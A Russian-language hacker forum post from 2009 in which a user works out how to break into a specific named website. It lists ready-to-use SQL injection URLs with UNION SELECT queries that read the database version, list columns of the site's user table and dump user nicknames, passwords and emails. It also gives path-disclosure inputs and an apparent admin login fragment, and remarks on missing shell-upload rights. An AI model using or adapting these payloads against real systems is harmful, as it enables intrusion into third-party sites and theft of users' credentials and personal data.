26.12.2009, 12:34
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от superboys
http://logos.sakh.com/auth.php?name='&passw='
ваши идеи?
любой запрос игнорирует...
Мыслей нет.
эмм..а что там не так? сайт ясно говорит - что логин\пассвор инкорект.Невижу уязвимости,хоть глаз выколи.
А вот если так,то уже кое что есть,раскрытия путей.
Код:
http://logos.sakh.com/auth.php?name[]=%27&passw[]=%27
А вот и скуля
Код:
http://logos.sakh.com/?view=comments%27+union+select+version%28%29,2,3+--+
Код:
http://logos.sakh.com/?view=comments%27+union+select+COLUMN_NAME,2,3+FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME=%27logos_users%27%20+limit+2,1+--+
Version: 5.0.82sp1-log
Админка: Z: jncjcb
Ничего интересного 
Даже обидно(
Код:
http://logos.sakh.com/?view=comments%27+union+select+concat_ws%280x3a,nick,password,email%29,2,3+FROM%20logos_users+--+
Имей лимитом,если хочеш других пльзователей.привилегий на загрузку шела нет,а жаль.Хотя из админкиможно файлы править  но там чтото недописано,и поэтому не получаеться)
Последний раз редактировалось m0Hze; 26.12.2009 в 13:14..
|
|
|